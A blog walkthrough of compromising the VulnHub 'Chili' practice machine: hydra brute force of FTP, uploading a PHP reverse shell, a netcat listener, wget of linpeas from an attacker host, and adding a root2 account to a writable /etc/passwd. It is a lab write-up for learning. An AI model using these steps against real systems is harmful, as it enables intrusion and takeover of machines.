<!doctype html><html lang=en>
<head>
<meta charset=utf-8>
<meta name=viewport content="width=device-width,initial-scale=1">
<meta http-equiv=content-language content="en">
<meta name=color-scheme content="light dark">
<meta http-equiv=content-security-policy content="upgrade-insecure-requests; block-all-mixed-content; default-src 'self'; child-src 'self'; font-src 'self' https://fonts.gstatic.com https://cdn.jsdelivr.net/; form-action 'self'; frame-src 'self'; img-src 'self'; object-src 'none'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com/ https://cdn.jsdelivr.net/; script-src 'self' 'unsafe-inline' https://www.google-analytics.com; prefetch-src 'self'; connect-src 'self' https://www.google-analytics.com;">
<meta name=author content="Kiel Vaughn">
<meta name=description content="Chili is a vulnerable system found on VulnHub. Below are the steps I utilized to compromise this vulnerable box.
First, after importing the machine, I ran netdiscover -i eth0 to discover the IP address of the host.
Next, I ran threader3000 to enumerate the TCP ports that were open on this host and let it complete it&rsquo;s recommended nmap scan.
It appears that there is both a web server and FTP running on this host.">
<meta name=keywords content="blog,cybersecurity,personal">
<meta name=twitter:card content="summary">
<meta name=twitter:title content="Chili">
<meta name=twitter:description content="Chili is a vulnerable system found on VulnHub. Below are the steps I utilized to compromise this vulnerable box.
First, after importing the machine, I ran netdiscover -i eth0 to discover the IP address of the host.
Next, I ran threader3000 to enumerate the TCP ports that were open on this host and let it complete it&rsquo;s recommended nmap scan.
It appears that there is both a web server and FTP running on this host.">
<meta property="og:title" content="Chili">
<meta property="og:description" content="Chili is a vulnerable system found on VulnHub. Below are the steps I utilized to compromise this vulnerable box.
First, after importing the machine, I ran netdiscover -i eth0 to discover the IP address of the host.
Next, I ran threader3000 to enumerate the TCP ports that were open on this host and let it complete it&rsquo;s recommended nmap scan.
It appears that there is both a web server and FTP running on this host.">
<meta property="og:type" content="article">
<meta property="og:url" content="http://www.kielvaughn.com/ctfs/2020-10-9-chili/"><meta property="article:section" content="ctfs">
<meta property="article:published_time" content="2020-10-09T00:00:00+00:00">
<meta property="article:modified_time" content="2020-10-09T00:00:00+00:00">
<title>
Chili · Kiel Vaughn, CISSP
</title>
<link rel=canonical href=http://www.kielvaughn.com/ctfs/2020-10-9-chili/>
<link rel=preload href="/fonts/forkawesome-webfont.woff2?v=1.2.0" as=font type=font/woff2 crossorigin>
<link rel=stylesheet href=/css/coder.min.708686f8ab8176e91d44fcbe488a0fe0333b94f405cf18a52383d67ba22f0ccb.css integrity="sha256-cIaG+KuBdukdRPy+SIoP4DM7lPQFzxilI4PWe6IvDMs=" crossorigin=anonymous media=screen>
<link rel=stylesheet href=/css/coder-dark.min.aa883b9ce35a8ff4a2a5008619005175e842bb18a8a9f9cc2bbcf44dab2d91fa.css integrity="sha256-qog7nONaj/SipQCGGQBRdehCuxioqfnMK7z0Tastkfo=" crossorigin=anonymous media=screen>
<link rel=icon type=image/png href=/assets/img/cissp.ico sizes=32x32>
<link rel=icon type=image/png href=/assets/img/cissp.ico sizes=16x16>
<link rel=apple-touch-icon href=/assets/img/cissp.ico>
<link rel=apple-touch-icon sizes=180x180 href=/assets/img/cissp.ico>
<meta name=generator content="Hugo 0.89.2">
</head>
<body class="preload-transitions colorscheme-dark">
<main class=wrapper>
<nav class=navigation>
<section class=container>
<a class=navigation-title href=/>
Kiel Vaughn, CISSP
</a>
<input type=checkbox id=menu-toggle>
<label class="menu-button float-right" for=menu-toggle>
<i class="fa fa-bars fa-fw" aria-hidden=true></i>
</label>
<ul class=navigation-list>
<li class=navigation-item>
<a class=navigation-link href=/whoami/>whoami</a>
</li>
<li class=navigation-item>
<a class=navigation-link href=/certifications/>certifications</a>
</li>
<li class=navigation-item>
<a class=navigation-link href=/posts/>blog</a>
</li>
<li class=navigation-item>
<a class=navigation-link href=/ctfs/>vulnerable machine walkthroughs</a>
</li>
</ul>
</section>
</nav>
<div class=content>
<section class="container page">
<article>
<header>
<h1 class=title>
<a class=title-link href=http://www.kielvaughn.com/ctfs/2020-10-9-chili/>
Chili
</a>
</h1>
</header>
<p><a href=https://www.vulnhub.com/entry/chili-1,558/>Chili</a> is a vulnerable system found on VulnHub. Below are the steps I utilized to compromise this vulnerable box.</p>
<p>First, after importing the machine, I ran <strong>netdiscover -i eth0</strong> to discover the IP address of the host.</p>
<p><img src=/assets/img/Chili1.png alt="Chili netdiscover"></p>
<p>Next, I ran <strong>threader3000</strong> to enumerate the TCP ports that were open on this host and let it complete it&rsquo;s recommended nmap scan.</p>
<p><img src=/assets/img/Chili2.png alt="Chili threader3000 nmap"></p>
<p>It appears that there is both a web server and FTP running on this host. I first looked at the website to see if there was anything useful on it to start off. This returned a site with a picture of a chili pepper and nothing else. A review of the source code of the page revealed nothing of interest either.</p>
<p><img src=/assets/img/Chili3.png alt="Chili website"></p>
<p>Next, I ran <strong>gobuster dir -u http://[machine ip]</strong> to see if it came up with any results. Unfortunately this did not return any results.</p>
<p>I next turned my attention to the open FTP port. anonymous FTP was not open, but I decided to attempt to brute force FTP with hydra. I utilized the username of <strong>chili</strong> based on a hint listed on the vulnhub website. The command I used was <strong>hydra -s 21 -l chili -P /usr/share/seclists/Passwords/Common-Credentials/best1050.txt -t 20 [machine ip] ftp -V</strong>. After a bit of time, the password was cracked:</p>
<p><img src=/assets/img/Chili4.png alt="Chili Hydra brute force"></p>
<p>Now that we have ftp credentials, lets log in and look around. After initially logging in, it appears that we are in the <strong>/home/chili</strong> directory.</p>
<p><img src=/assets/img/Chili5.png alt="Chili ftp access"></p>
<p>We know SSH isn&rsquo;t running, or else we could upload a key to gain access. Since only FTP and HTTP are running, let&rsquo;s upload a root shell. First, let&rsquo;s run <strong>cd /var/www/html</strong> to navigate to the default HTML folder for Apache. Once here, we can run <strong>ls -al</strong> to list the directory contents to confirm we are in the main folder for the hosted website.</p>
<p><img src=/assets/img/Chili6.png alt="Chili ftp html directory"></p>
<p>Next, let&rsquo;s upload <a href=https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php>PenTestMonkey&rsquo;s Reverse PHP Shell</a>. We will need to modify the IP address and port as designated with the <strong>// CHANGE THIS</strong> section in the code with your attacker&rsquo;s IP and port of your choice to connect to.</p>
<p><img src=/assets/img/Chili7.png alt="Chili Reverse PHP Shell modification"></p>
<p>Next, from your FTP session, run <strong>cd /var/www/html/.nano</strong> run <strong>lcd [path to where you saved the reverse PHP shell]</strong> followed by <strong>put reverse-shell.php</strong> to upload your PHP reverse shell. We did this as through testing we did not have the permissions to upload a shell to the /var/www/html folder, but the .nano subfolder we had permissions to access.</p>
<p><img src=/assets/img/Chili8.png alt="Chili ftp upload reverse shell"></p>
<p>Next, in another terminal window, run <strong>nc -nvlp [port #]</strong> where port # is the port you specified in the reverse shell. This will create a listener on this port on your attacker machine.</p>
<p><img src=/assets/img/Chili9.png alt="Chili nc listener"></p>
<p>Next, navigate to <strong>http://[machine ip]/.nano/reverse-shell.php</strong>. Unfortunately, this does not create a shell, this is because we did not make the php file executable. From the FTP session, run <strong>chmod 777 reverse-shell.php</strong> and then try to reload the web page.</p>
<p><img src=/assets/img/Chili10.png alt="Chili chmod reverse-shell.php"></p>
<p><img src=/assets/img/Chili11.png alt="Chili webpage reverse PHP shell"></p>
<p>Now, go back to your netcat terminal window, you should have a reverse shell. Running <strong>whoami</strong> will let you know you are currently the <strong>www-data</strong> user.</p>
<p><img src=/assets/img/Chili12.png alt="Chili www-data foothold"></p>
<p>Let&rsquo;s run <strong>linpeas</strong> in order to enumerate this host for potential avenues of privilege escalation to root. In order to do so, you will need to host a python HTTP server in a folder that has the <strong>linpeas.sh</strong> script on your attacker machine. The command to run to host an HTTP server is <strong>python3 -m http.server</strong>.</p>
<p><img src=/assets/img/Chili13.png alt="Chili attacker python http server"></p>
<p>Next, from your foothold as www-data, run <strong>cd /tmp</strong>, <strong>wget http://[attacker ip]:8000/linpeas.sh</strong>, and finally, <strong>chmod 777 linpeas.sh</strong>. The <strong>/tmp</strong> folder is used as it is typically writeable by any user, the 2nd command downloads the script from your attacker machine, and the 3rd one makes it executable.</p>
<p><img src=/assets/img/Chili14.png alt="Chili linpeas.sh"></p>
<p>Now, run <strong>./linpeas.sh</strong> and review the results. After review, it appears that we can write to the <strong>/etc/passwd</strong> file.</p>
<p><img src=/assets/img/Chili15.png alt="Chili linpeas.sh output"></p>
<p>Next, let&rsquo;s run <strong>cd /etc</strong> followed by <strong>ls -al|grep passwd</strong> to confirm we have write access to this file. It appears that we do.</p>
<p><img src=/assets/img/Chili16.png alt="Chili /etc/passwd"></p>
<p>Let&rsquo;s use openssl to generate a password of <strong>pwned</strong> and use it to create a <strong>root2</strong> user and add it to the /etc/passwd file with <strong>echo &ldquo;root2:pr652V7MdLRRg:0:0:root:/root:/bin/bash&rdquo; &#187; /etc/passwd</strong></p>
<p><img src=/assets/img/Chili17.png alt="Chili create 2nd root user"></p>
<p>Next, let&rsquo;s run <strong>su root2</strong> and enter the password we just created (<strong>pwned</strong>). Running <strong>whoami</strong> shows you are now running as root.</p>
<p><img src=/assets/img/Chili18.png alt="Chili su root2"></p>
<p>Finally, let&rsquo;s run <strong>cd /root</strong> followed by <strong>ls -al</strong> and finally <strong>cat proof.txt</strong> to finish this box.</p>
<p><img src=/assets/img/Chili19.png alt="Chili proof.txt"></p>
</article>
</section>
</div>
<footer class=footer>
<section class=container>
©
2020 -
2021
Kiel Vaughn
</section>
</footer>
</main>
<script src=/js/coder.min.03b17769f4f91ae35667e1f2a1ca8c16f50562576cf90ff32b3179926914daa5.js integrity="sha256-A7F3afT5GuNWZ+HyocqMFvUFYlds+Q/zKzF5kmkU2qU="></script>
</body>
</html>